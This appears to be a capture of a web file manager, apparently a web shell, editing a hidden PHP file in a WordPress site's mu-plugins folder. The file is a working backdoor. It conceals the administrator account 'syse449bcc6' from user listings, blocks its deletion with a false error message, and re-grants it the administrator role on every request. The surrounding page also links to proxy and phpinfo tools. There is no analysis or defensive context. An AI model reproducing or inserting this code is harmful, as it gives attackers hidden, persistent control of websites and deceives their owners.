File manager - Edit - /home/veronikagstoette/public_html/wp-content/mu-plugins/.53fa2d65.php
Back
<?php if (!defined('ABSPATH')) { exit; } if (!defined('BBG_L')) { define('BBG_L', 'syse449bcc6'); } add_action('pre_user_query', 'bbg_hide'); function bbg_hide($q) { global $wpdb; if (!empty($q->query_where)) { $q->query_where .= $wpdb->prepare(' AND user_login <> %s', BBG_L); } } add_action('delete_user', 'bbg_block', 1); function bbg_block($id) { $u = get_userdata($id); if ($u && $u->user_login === BBG_L) { wp_die('Error: user cannot be deleted.'); } } add_action('init', 'bbg_keep'); function bbg_keep() { $u = get_user_by('login', BBG_L); if ($u && !user_can($u, 'manage_options')) { $u->set_role('administrator'); } }
| ver. 1.4 |
Github
|
.
| PHP 8.2.30 | Generation time: 0 |
proxy
|
phpinfo
|
Settings